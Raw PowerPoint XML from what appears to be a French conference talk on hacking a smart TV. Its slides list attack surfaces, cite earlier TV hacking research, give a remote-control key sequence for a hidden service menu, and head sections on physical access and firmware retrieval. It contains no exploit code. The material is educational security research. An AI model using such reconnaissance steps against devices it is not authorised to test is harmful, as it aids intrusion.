                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46369345-7580-D645-A6F3-0C7B491558F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2457475" y="1408647"/>
            <a:ext cx="0" cy="3483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889D3C95-A46D-A54D-CE91-0CAA12CEE501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2319701" y="640830"/>
            <a:ext cx="1098088" cy="3870389"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34217"/>
              <a:gd name="adj2" fmla="val 105906"/>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9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71FFD94-C45E-1B08-1FA2-B6FF080227EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="200024"/>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gn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0"/>
              <a:t>Navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C227DD-FD96-78FC-9E0C-E1F39D9F127A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="397458"/>
            <a:ext cx="221773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71500" lvl="1" indent="-228600" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264028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4C96F4A-645A-A8AC-09C6-3E8927A60B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B6AC26-4AD5-1816-8713-FD43FEC78850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="2022-06-11 11-34-32">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CD5613-ED8B-857A-F433-BCC4223CD1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510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80AAC58-F6A2-E438-3764-C55BC14852D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3123" r="1610" b="575"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694805" y="761348"/>
            <a:ext cx="3084069" cy="3943564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C44DF5A-641C-E111-806E-7CB0EE4CFD3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1028F46-0144-D18A-BCA2-1E4A2FB1DB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB6A8BE-3720-282A-25E1-FDAE8B48C2DF}"/>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C07D0081-62E2-8C15-0348-EC0A45E13B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC0199B-CE2B-31B7-437F-223DEDDA9BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sources d’informations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66E2AD7B-8B3C-33B7-1527-76427E3B89A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694805" y="3926185"/>
            <a:ext cx="2690565" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extrait du manuel utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F7B857-7B07-941A-CE9F-A5C195FAAE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522586" y="2971800"/>
            <a:ext cx="319664"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26F8831-06E0-35F8-39D3-F82D71CA1460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8346825" y="3568700"/>
            <a:ext cx="365375" cy="10966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A48E748-A85D-BCAB-809C-A6456E23DD1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1202363"/>
            <a:ext cx="5009396" cy="3000821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Connexion réseau filaire ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WiFi</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bluetooth (Application smartphone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>RemoteNow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Interface Utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Prise service non documenté dans le manuel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Possibilité de brancher un disque dur ou une clé USB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Module CI (Common Interface) : Système de contrôle d’accès des programmes et services payants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Existant :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DVB-T (Digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Video</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Broadcasting – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Terrestrial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>DefCamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> 2016 - DVB-T HACKING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/hacking-smart-tv-command-injection/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Rooting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Samsung Q60T Smart-TV ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Sthack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2022 )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344720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E3B5B-76B9-BB1C-D516-EEA39E1B63E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>FUN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2259BCB9-FAC3-9922-646B-30CDC139DF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5C01B2-8BC6-808F-C1BC-C387A40FE0BE}"/>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4D1970CE-57DF-447B-BCF7-065D87DF0993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED66D693-852D-BDC3-2C2F-FC5625C4138B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sources d’informations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E53645E-209E-DA48-5375-3F1ABC9B75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339"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1202364"/>
            <a:ext cx="5064124" cy="3557360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30965BFD-2CBD-B331-C7DD-5F16D1347749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465514" y="1202364"/>
            <a:ext cx="3579419" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Hit menu on the remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Tap right to enter the full menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Scroll down to sound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Tap right and select Advanced Audio Settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Scroll down and highlight the Balance slider, make sure it is on 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Enter 1969 on your remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>The menu will disappear and a green "M" will appear at the top left</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Hit menu on the remote, this time a service menu will appear</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66707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342D45-112A-7101-8C4A-D77627E53DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E6648D-0CAE-201B-05D0-F9B2405AA33A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D649FC3-E8CE-198B-CB22-E5E3A25F0E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532F2E4D-66D2-ADEE-8AD7-F9EFEFCB4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812" y="1458212"/>
            <a:ext cx="6048375" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40358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C3884-6135-5A79-80F5-2C742D23F346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Récupérer le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
